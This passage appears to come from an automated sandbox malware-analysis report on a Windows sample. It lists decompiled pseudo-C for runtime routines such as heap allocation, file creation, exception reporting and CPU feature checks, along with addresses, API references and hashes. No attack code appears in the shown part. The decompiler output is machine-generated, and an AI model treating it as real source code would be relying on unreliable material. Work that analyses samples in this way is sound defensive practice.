                                                          0x00407f70
                                                          0x00407f76
                                                          0x00407f7c
                                                          0x00407f84
                                                          0x00407f8b
                                                          0x00407f8b
                                                          0x00407f51

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: __wsopen_s
                                                          • String ID:
                                                          • API String ID: 3347428461-0
                                                          • Opcode ID: aa105744ec724d6492fa52795bcd8a3472d403bb09466538711de480dce8988d
                                                          • Instruction ID: 499fe2b5395409ba64e5587ff3f471bb224acec686096afd9ad12c4f2888ffd7
                                                          • Opcode Fuzzy Hash: aa105744ec724d6492fa52795bcd8a3472d403bb09466538711de480dce8988d
                                                          • Instruction Fuzzy Hash: 4A111871A0420AAFCB05DF58E94199B7BF5EF48304F0440AAF805EB351D674E911CBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 274 408637-408642 275 408650-408656 274->275 276 408644-40864e 274->276 278 408658-408659 275->278 279 40866f-408680 RtlAllocateHeap 275->279 276->275 277 408684-40868f call 407b6a 276->277 283 408691-408693 277->283 278->279 280 408682 279->280 281 40865b-408662 call 405c68 279->281 280->283 281->277 287 408664-40866d call 40b172 281->287 287->277 287->279
                                                          C-Code - Quality: 100%
                                                          			E00408637(signed int _a4, signed int _a8) {
                                                          				void* _t8;
                                                          				void* _t12;
                                                          				signed int _t13;
                                                          				signed int _t18;
                                                          				long _t19;
                                                          
                                                          				_t18 = _a4;
                                                          				if(_t18 == 0) {
                                                          					L2:
                                                          					_t19 = _t18 * _a8;
                                                          					if(_t19 == 0) {
                                                          						_t19 = _t19 + 1;
                                                          					}
                                                          					while(1) {
                                                          						_t8 = RtlAllocateHeap( *0x41931c, 8, _t19); // executed
                                                          						if(_t8 != 0) {
                                                          							break;
                                                          						}
                                                          						__eflags = E00405C68();
                                                          						if(__eflags == 0) {
                                                          							L8:
                                                          							 *((intOrPtr*)(E00407B6A())) = 0xc;
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						}
                                                          						_t12 = E0040B172(__eflags, _t19);
                                                          						__eflags = _t12;
                                                          						if(_t12 == 0) {
                                                          							goto L8;
                                                          						}
                                                          					}
                                                          					return _t8;
                                                          				}
                                                          				_t13 = 0xffffffe0;
                                                          				if(_t13 / _t18 < _a8) {
                                                          					goto L8;
                                                          				}
                                                          				goto L2;
                                                          			}








                                                          0x0040863d
                                                          0x00408642
                                                          0x00408650
                                                          0x00408650
                                                          0x00408656
                                                          0x00408658
                                                          0x00408658
                                                          0x0040866f
                                                          0x00408678
                                                          0x00408680
                                                          0x00000000
                                                          0x00000000
                                                          0x00408660
                                                          0x00408662
                                                          0x00408684
                                                          0x00408689
                                                          0x0040868f
                                                          0x00000000
                                                          0x0040868f
                                                          0x00408665
                                                          0x0040866b
                                                          0x0040866d
                                                          0x00000000
                                                          0x00000000
                                                          0x0040866d
                                                          0x00000000
                                                          0x0040866f
                                                          0x00408648
                                                          0x0040864e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,00401043,?,?,00406E0E,00000001,00000364,?,00000007,000000FF,?,00407B6F,00404774,00416678,00000010,00404825), ref: 00408678
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: be9bc746c27aef2aebc04bf4b34705a674c11dd085718fbf78c15a8a5f8c8caf
                                                          • Instruction ID: df5b740612e1de9bb7099b5f70f78f8fb923898ce6b5c21f08b47179631472d2
                                                          • Opcode Fuzzy Hash: be9bc746c27aef2aebc04bf4b34705a674c11dd085718fbf78c15a8a5f8c8caf
                                                          • Instruction Fuzzy Hash: C0F0BB3150452596DB215A325E05A5B37589B52760B1BC93FEC84B62D0CF3DD80185ED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 290 40c070-40c094 CreateFileW
                                                          C-Code - Quality: 100%
                                                          			E0040C070(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
                                                          				void* _t10;
                                                          
                                                          				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
                                                          				return _t10;
                                                          			}




                                                          0x0040c08d
                                                          0x0040c094

                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,00000000,?,0040C460,?,?,00000000,?,0040C460,?,0000000C), ref: 0040C08D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: ee011ea15fa47f3e8f8e62051be055a0f7823555ed440cff19abb18d1e11d41a
                                                          • Instruction ID: 0b1d8daba3015af28ec98abb3884bff436453666314a6f6df86decdfee5a869d
                                                          • Opcode Fuzzy Hash: ee011ea15fa47f3e8f8e62051be055a0f7823555ed440cff19abb18d1e11d41a
                                                          • Instruction Fuzzy Hash: 50D06C3201014DBFDF029F84DD06EDA3FAAFB4C754F018010BA1856020C732E861AB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 81%
                                                          			E0040636B(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, char _a4, char _a8, char _a12) {
                                                          				char _v0;
                                                          				signed int _v8;
                                                          				intOrPtr _v524;
                                                          				intOrPtr _v528;
                                                          				void* _v532;
                                                          				intOrPtr _v536;
                                                          				intOrPtr _v540;
                                                          				intOrPtr _v544;
                                                          				intOrPtr _v548;
                                                          				intOrPtr _v552;
                                                          				intOrPtr _v556;
                                                          				intOrPtr _v560;
                                                          				intOrPtr _v564;
                                                          				intOrPtr _v568;
                                                          				intOrPtr _v572;
                                                          				intOrPtr _v576;
                                                          				intOrPtr _v580;
                                                          				intOrPtr _v584;
                                                          				char _v724;
                                                          				intOrPtr _v792;
                                                          				intOrPtr _v800;
                                                          				char _v804;
                                                          				intOrPtr _v808;
                                                          				char _v812;
                                                          				void* __edi;
                                                          				signed int _t40;
                                                          				char* _t47;
                                                          				intOrPtr _t49;
                                                          				intOrPtr _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t65;
                                                          				intOrPtr _t66;
                                                          				int _t67;
                                                          				intOrPtr _t68;
                                                          				signed int _t69;
                                                          
                                                          				_t68 = __esi;
                                                          				_t65 = __edx;
                                                          				_t60 = __ebx;
                                                          				_t40 =  *0x418014; // 0xb25f2588
                                                          				_t41 = _t40 ^ _t69;
                                                          				_v8 = _t40 ^ _t69;
                                                          				if(_a4 != 0xffffffff) {
                                                          					_push(_a4);
                                                          					E0040195A(_t41);
                                                          					_pop(_t61);
                                                          				}
                                                          				E004020F0(_t66,  &_v804, 0, 0x50);
                                                          				E004020F0(_t66,  &_v724, 0, 0x2cc);
                                                          				_v812 =  &_v804;
                                                          				_t47 =  &_v724;
                                                          				_v808 = _t47;
                                                          				_v548 = _t47;
                                                          				_v552 = _t61;
                                                          				_v556 = _t65;
                                                          				_v560 = _t60;
                                                          				_v564 = _t68;
                                                          				_v568 = _t66;
                                                          				_v524 = ss;
                                                          				_v536 = cs;
                                                          				_v572 = ds;
                                                          				_v576 = es;
                                                          				_v580 = fs;
                                                          				_v584 = gs;
                                                          				asm("pushfd");
                                                          				_pop( *_t22);
                                                          				_t23 =  &_v0; // 0x0
                                                          				_v540 =  *_t23;
                                                          				_t25 =  &_v0; // 0x41667c
                                                          				_t49 = _t25;
                                                          				_v528 = _t49;
                                                          				_v724 = 0x10001;
                                                          				_t28 = _t49 - 4; // 0xfffffffe
                                                          				_v544 =  *_t28;
                                                          				_t30 =  &_a8; // 0x0
                                                          				_v804 =  *_t30;
                                                          				_t32 =  &_a12; // 0xfffffffe
                                                          				_v800 =  *_t32;
                                                          				_t34 =  &_v0; // 0x0
                                                          				_v792 =  *_t34;
                                                          				_t67 = IsDebuggerPresent();
                                                          				SetUnhandledExceptionFilter(0);
                                                          				_t36 =  &_v812; // 0x416350
                                                          				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                                                          					_t38 =  &_a4; // 0xffffffd0
                                                          					_push( *_t38);
                                                          					_t57 = E0040195A(_t57);
                                                          				}
                                                          				_t39 =  &_v8; // 0x0
                                                          				return E00401BE5(_t57, _t60,  *_t39 ^ _t69, _t65, _t67, _t68);
                                                          			}






































                                                          0x0040636b
                                                          0x0040636b
                                                          0x0040636b
                                                          0x00406376
                                                          0x0040637b
                                                          0x0040637d
                                                          0x00406385
                                                          0x00406387
                                                          0x0040638a
                                                          0x0040638f
                                                          0x0040638f
                                                          0x0040639b
                                                          0x004063ae
                                                          0x004063bc
                                                          0x004063c2
                                                          0x004063c8
                                                          0x004063ce
                                                          0x004063d4
                                                          0x004063da
                                                          0x004063e0
                                                          0x004063e6
                                                          0x004063ec
                                                          0x004063f2
                                                          0x004063f9
                                                          0x00406400
                                                          0x00406407
                                                          0x0040640e
                                                          0x00406415
                                                          0x0040641c
                                                          0x0040641d
                                                          0x00406423
                                                          0x00406426
                                                          0x0040642c
                                                          0x0040642c
                                                          0x0040642f
                                                          0x00406435
                                                          0x0040643f
                                                          0x00406442
                                                          0x00406448
                                                          0x0040644b
                                                          0x00406451
                                                          0x00406454
                                                          0x0040645a
                                                          0x0040645d
                                                          0x0040646b
                                                          0x0040646d
                                                          0x00406473
                                                          0x00406482
                                                          0x0040648e
                                                          0x0040648e
                                                          0x00406491
                                                          0x00406496
                                                          0x00406497
                                                          0x004064a3

                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00406463
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040646D
                                                          • UnhandledExceptionFilter.KERNEL32(00416350,?,?,?,?,?,?), ref: 0040647A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID: xfA
                                                          • API String ID: 3906539128-2547998173
                                                          • Opcode ID: ab89187c494adc915da360c4805c5dc327673be7f69fda436567295ad0e905a3
                                                          • Instruction ID: 27c9b2d5d83fa03b24cdeef42b518778bdbb3f72f2c29e3cb957f73c7f56a9f2
                                                          • Opcode Fuzzy Hash: ab89187c494adc915da360c4805c5dc327673be7f69fda436567295ad0e905a3
                                                          • Instruction Fuzzy Hash: D931E57494121C9BCB21DF65D9887CDBBB4BF08310F5081EAE50DA72A0EB749F818F58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E00401796(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                          				char _v0;
                                                          				struct _EXCEPTION_POINTERS _v12;
                                                          				intOrPtr _v80;
                                                          				intOrPtr _v88;
                                                          				char _v92;
                                                          				intOrPtr _v608;
                                                          				intOrPtr _v612;
                                                          				void* _v616;
                                                          				intOrPtr _v620;
                                                          				char _v624;
                                                          				intOrPtr _v628;
                                                          				intOrPtr _v632;
                                                          				intOrPtr _v636;
                                                          				intOrPtr _v640;
                                                          				intOrPtr _v644;
                                                          				intOrPtr _v648;
                                                          				intOrPtr _v652;
                                                          				intOrPtr _v656;
                                                          				intOrPtr _v660;
                                                          				intOrPtr _v664;
                                                          				intOrPtr _v668;
                                                          				char _v808;
                                                          				char* _t39;
                                                          				long _t49;
                                                          				intOrPtr _t51;
                                                          				void* _t54;
                                                          				intOrPtr _t55;
                                                          				intOrPtr _t57;
                                                          				intOrPtr _t58;
                                                          				intOrPtr _t59;
                                                          				intOrPtr* _t60;
                                                          
                                                          				_t59 = __esi;
                                                          				_t58 = __edi;
                                                          				_t57 = __edx;
                                                          				if(IsProcessorFeaturePresent(0x17) != 0) {
                                                          					_t55 = _a4;
                                                          					asm("int 0x29");
                                                          				}
                                                          				E0040195A(_t34);
                                                          				 *_t60 = 0x2cc;
                                                          				_v632 = E004020F0(_t58,  &_v808, 0, 3);
                                                          				_v636 = _t55;
                                                          				_v640 = _t57;
                                                          				_v644 = _t51;
                                                          				_v648 = _t59;
                                                          				_v652 = _t58;
                                                          				_v608 = ss;
                                                          				_v620 = cs;
                                                          				_v656 = ds;
                                                          				_v660 = es;
                                                          				_v664 = fs;
                                                          				_v668 = gs;
                                                          				asm("pushfd");
                                                          				_pop( *_t15);
                                                          				_v624 = _v0;
                                                          				_t39 =  &_v0;
                                                          				_v612 = _t39;
                                                          				_v808 = 0x10001;
                                                          				_v628 =  *((intOrPtr*)(_t39 - 4));
                                                          				E004020F0(_t58,  &_v92, 0, 0x50);
                                                          				_v92 = 0x40000015;
                                                          				_v88 = 1;
                                                          				_v80 = _v0;
                                                          				_t28 = IsDebuggerPresent() - 1; // -1
                                                          				_v12.ExceptionRecord =  &_v92;
                                                          				asm("sbb bl, bl");
                                                          				_v12.ContextRecord =  &_v808;
                                                          				_t54 =  ~_t28 + 1;
                                                          				SetUnhandledExceptionFilter(0);
                                                          				_t49 = UnhandledExceptionFilter( &_v12);
                                                          				if(_t49 == 0 && _t54 == 0) {
                                                          					_push(3);
                                                          					return E0040195A(_t49);
                                                          				}
                                                          				return _t49;
                                                          			}


































                                                          0x00401796
                                                          0x00401796
                                                          0x00401796
                                                          0x004017aa
                                                          0x004017ac
                                                          0x004017af
                                                          0x004017af
                                                          0x004017b3
                                                          0x004017b8
                                                          0x004017d0
                                                          0x004017d6
                                                          0x004017dc
                                                          0x004017e2
                                                          0x004017e8
                                                          0x004017ee
                                                          0x004017f4
                                                          0x004017fb
                                                          0x00401802
                                                          0x00401809
                                                          0x00401810
                                                          0x00401817
                                                          0x0040181e
                                                          0x0040181f
                                                          0x00401828
                                                          0x0040182e
                                                          0x00401831
                                                          0x00401837
                                                          0x00401846
                                                          0x00401852
                                                          0x0040185d
                                                          0x00401864
                                                          0x0040186b
                                                          0x00401876
                                                          0x0040187e
                                                          0x00401887
                                                          0x00401889
                                                          0x0040188c
                                                          0x0040188e
                                                          0x00401898
                                                          0x004018a0
                                                          0x004018a6
                                                          0x00000000
                                                          0x004018ad
                                                          0x004018b0

                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004017A2
                                                          • IsDebuggerPresent.KERNEL32 ref: 0040186E
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040188E
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00401898
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                          • String ID:
                                                          • API String ID: 254469556-0
                                                          • Opcode ID: 08540eaf6671ec7f696a0aaf15c92f03ad5e830cf6d10267c62a163a4b023842
                                                          • Instruction ID: a683ffaa2d68fa853aa4380f613157507114c95401a7bea838927c74ec0f93fa
                                                          • Opcode Fuzzy Hash: 08540eaf6671ec7f696a0aaf15c92f03ad5e830cf6d10267c62a163a4b023842
                                                          • Instruction Fuzzy Hash: DD313A75D01218DBDB10EFA5D9897CDBBB8BF08304F1081AAE50DA7290EB755B84CF08
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E00401A05(signed int __edx) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				signed int _v36;
                                                          				signed int _v40;
                                                          				intOrPtr _t60;
                                                          				signed int _t61;
                                                          				signed int _t62;
                                                          				signed int _t63;
                                                          				signed int _t66;
                                                          				signed int _t67;
                                                          				signed int _t73;
                                                          				intOrPtr _t74;
                                                          				intOrPtr _t75;
                                                          				intOrPtr* _t77;
                                                          				signed int _t78;
                                                          				intOrPtr* _t82;
                                                          				signed int _t85;
                                                          				signed int _t90;
                                                          				intOrPtr* _t93;
                                                          				signed int _t96;
                                                          				signed int _t99;
                                                          				signed int _t104;
                                                          
                                                          				_t90 = __edx;
                                                          				 *0x41896c =  *0x41896c & 0x00000000;
                                                          				 *0x418010 =  *0x418010 | 0x00000001;
                                                          				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                          					L23:
                                                          					return 0;
                                                          				}
                                                          				_v20 = _v20 & 0x00000000;
                                                          				_push(_t74);
                                                          				_t93 =  &_v40;
                                                          				asm("cpuid");
                                                          				_t75 = _t74;
                                                          				 *_t93 = 0;
                                                          				 *((intOrPtr*)(_t93 + 4)) = _t74;
                                                          				 *((intOrPtr*)(_t93 + 8)) = 0;
                                                          				 *(_t93 + 0xc) = _t90;
                                                          				_v16 = _v40;
                                                          				_v8 = _v28 ^ 0x49656e69;
                                                          				_v12 = _v32 ^ 0x6c65746e;
                                                          				_push(_t75);
                                                          				asm("cpuid");
                                                          				_t77 =  &_v40;
                                                          				 *_t77 = 1;
                                                          				 *((intOrPtr*)(_t77 + 4)) = _t75;
                                                          				 *((intOrPtr*)(_t77 + 8)) = 0;
                                                          				 *(_t77 + 0xc) = _t90;
                                                          				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
                                                          					L9:
                                                          					_t96 =  *0x418970; // 0x2
                                                          					L10:
                                                          					_t85 = _v32;
                                                          					_t60 = 7;
                                                          					_v8 = _t85;
                                                          					if(_v16 < _t60) {
                                                          						_t78 = _v20;
                                                          					} else {
                                                          						_push(_t77);
                                                          						asm("cpuid");
                                                          						_t82 =  &_v40;
                                                          						 *_t82 = _t60;
                                                          						 *((intOrPtr*)(_t82 + 4)) = _t77;
                                                          						 *((intOrPtr*)(_t82 + 8)) = 0;
                                                          						_t85 = _v8;
                                                          						 *(_t82 + 0xc) = _t90;
                                                          						_t78 = _v36;
                                                          						if((_t78 & 0x00000200) != 0) {
                                                          							 *0x418970 = _t96 | 0x00000002;
                                                          						}
                                                          					}
                                                          					_t61 =  *0x418010; // 0x6f
                                                          					_t62 = _t61 | 0x00000002;
                                                          					 *0x41896c = 1;
                                                          					 *0x418010 = _t62;
                                                          					if((_t85 & 0x00100000) != 0) {
                                                          						_t63 = _t62 | 0x00000004;
                                                          						 *0x41896c = 2;
                                                          						 *0x418010 = _t63;
                                                          						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
                                                          							asm("xgetbv");
                                                          							_v24 = _t63;
                                                          							_v20 = _t90;
                                                          							_t104 = 6;
                                                          							if((_v24 & _t104) == _t104) {
                                                          								_t66 =  *0x418010; // 0x6f
                                                          								_t67 = _t66 | 0x00000008;
                                                          								 *0x41896c = 3;
                                                          								 *0x418010 = _t67;
                                                          								if((_t78 & 0x00000020) != 0) {
                                                          									 *0x41896c = 5;
                                                          									 *0x418010 = _t67 | 0x00000020;
                                                          									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
                                                          										 *0x418010 =  *0x418010 | 0x00000040;
                                                          										 *0x41896c = _t104;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					goto L23;
                                                          				}
                                                          				_t73 = _v40 & 0x0fff3ff0;
                                                          				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
                                                          					_t99 =  *0x418970; // 0x2
                                                          					_t96 = _t99 | 0x00000001;
                                                          					 *0x418970 = _t96;
                                                          					goto L10;
                                                          				} else {
                                                          					goto L9;
                                                          				}
                                                          			}






























                                                          0x00401a05
                                                          0x00401a08
                                                          0x00401a12
                                                          0x00401a23
                                                          0x00401bd5
                                                          0x00401bd8
                                                          0x00401bd8
                                                          0x00401a29
                                                          0x00401a2f
                                                          0x00401a34
                                                          0x00401a38
                                                          0x00401a3c
                                                          0x00401a3e
                                                          0x00401a40
                                                          0x00401a43
                                                          0x00401a48
                                                          0x00401a51
                                                          0x00401a62
                                                          0x00401a6d
                                                          0x00401a73
                                                          0x00401a74
                                                          0x00401a7a
                                                          0x00401a7d
                                                          0x00401a87
                                                          0x00401a8a
                                                          0x00401a8d
                                                          0x00401a90
                                                          0x00401ad5
                                                          0x00401ad5
                                                          0x00401adb
                                                          0x00401adb
                                                          0x00401ae0
                                                          0x00401ae1
                                                          0x00401ae7
                                                          0x00401b19
                                                          0x00401ae9
                                                          0x00401aeb
                                                          0x00401aec
                                                          0x00401af2
                                                          0x00401af5
                                                          0x00401af7
                                                          0x00401afa
                                                          0x00401afd
                                                          0x00401b00
                                                          0x00401b03
                                                          0x00401b0c
                                                          0x00401b11
                                                          0x00401b11
                                                          0x00401b0c
                                                          0x00401b1c
                                                          0x00401b21
                                                          0x00401b24
                                                          0x00401b2e
                                                          0x00401b39
                                                          0x00401b3f
                                                          0x00401b42
                                                          0x00401b4c
                                                          0x00401b57
                                                          0x00401b63
                                                          0x00401b66
                                                          0x00401b69
                                                          0x00401b74
                                                          0x00401b79
                                                          0x00401b7b
                                                          0x00401b80
                                                          0x00401b83
                                                          0x00401b8d
                                                          0x00401b95
                                                          0x00401b9a
                                                          0x00401ba4
                                                          0x00401bb2
                                                          0x00401bc5
                                                          0x00401bcc
                                                          0x00401bcc
                                                          0x00401bb2
                                                          0x00401b95
                                                          0x00401b79
                                                          0x00401b57
                                                          0x00000000
                                                          0x00401bd4
                                                          0x00401a95
                                                          0x00401a9f
                                                          0x00401ac4
                                                          0x00401aca
                                                          0x00401acd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00401A1B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID:
                                                          • API String ID: 2325560087-0
                                                          • Opcode ID: 444eac7619679f0b1c908bb5714ddf954d856699ccdef152b9532d6ef9c270d5
                                                          • Instruction ID: 373c9e0b331e01b867620f19eefc06ae9d0af40db80eaee874182935490031f7
                                                          • Opcode Fuzzy Hash: 444eac7619679f0b1c908bb5714ddf954d856699ccdef152b9532d6ef9c270d5
                                                          • Instruction Fuzzy Hash: BC512CB1A116498BDB18CF55D8857AABBF0FB48314F25C47AD411EB3A0E7789940CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040B0AF() {
                                                          				signed int _t3;
                                                          
                                                          				_t3 = GetProcessHeap();
                                                          				 *0x41931c = _t3;
                                                          				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                          			}




                                                          0x0040b0af
                                                          0x0040b0b7
                                                          0x0040b0bf

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: HeapProcess
                                                          • String ID:
                                                          • API String ID: 54951025-0
                                                          • Opcode ID: 2a9567a9e267271494f45bdb79e66690527d5ec8c2dee9d2a85c32e1b9fd09d0
                                                          • Instruction ID: 74de3031397c736b7dccde65fcb57def8cf328ed7ad9373991e44c4c279619cd
                                                          • Opcode Fuzzy Hash: 2a9567a9e267271494f45bdb79e66690527d5ec8c2dee9d2a85c32e1b9fd09d0
                                                          • Instruction Fuzzy Hash: FCA02230E00300CF8B00CF32AE0838C3FEABA0C2C0300C038E800C20B0EB3088808F08
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 71%
                                                          			E0040333B(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                                                          				signed char* _v0;
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _v24;
                                                          				char _v28;
                                                          				signed int _v32;
                                                          				signed int _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				intOrPtr _v48;
                                                          				signed int _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				void _v64;
                                                          				signed int _v68;
                                                          				char _v84;
                                                          				intOrPtr _v88;
                                                          				signed int _v92;
                                                          				intOrPtr _v100;
                                                          				void _v104;
                                                          				intOrPtr* _v112;
                                                          				signed char* _v184;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				void* _t201;
                                                          				signed int _t202;
                                                          				char _t203;
                                                          				signed int _t205;
                                                          				signed int _t207;
                                                          				signed char* _t208;
                                                          				signed int _t209;
                                                          				signed int _t210;
                                                          				signed int _t214;
                                                          				void* _t217;
                                                          				signed char* _t220;
                                                          				void* _t222;
                                                          				void* _t224;
                                                          				signed char _t228;
                                                          				signed int _t229;
                                                          				void* _t231;
                                                          				void* _t234;
                                                          				void* _t237;
                                                          				signed int _t247;
                                                          				void* _t250;
                                                          				intOrPtr* _t251;
                                                          				signed int _t252;
                                                          				intOrPtr _t253;
                                                          				signed int _t254;
                                                          				void* _t259;
                                                          				void* _t264;
                                                          				void* _t265;
                                                          				signed int _t269;
                                                          				signed char* _t270;
                                                          				intOrPtr* _t271;
                                                          				signed char _t272;
                                                          				signed int _t273;
                                                          				signed int _t274;
                                                          				intOrPtr* _t276;
                                                          				signed int _t277;
                                                          				signed int _t278;
                                                          				signed int _t283;
                                                          				signed int _t290;
                                                          				signed int _t291;
                                                          				signed int _t294;
                                                          				signed int _t296;
                                                          				signed char* _t297;
                                                          				signed int _t298;
                                                          				signed char _t299;
                                                          				signed int* _t301;
                                                          				signed char* _t304;
                                                          				signed int _t314;
                                                          				signed int _t315;
                                                          				signed int _t317;
                                                          				signed int _t327;
                                                          				void* _t329;
                                                          				void* _t331;
                                                          				void* _t332;
                                                          				void* _t333;
                                                          				void* _t334;
                                                          
                                                          				_t296 = __edx;
                                                          				_push(_t315);
                                                          				_t301 = _a20;
                                                          				_v20 = 0;
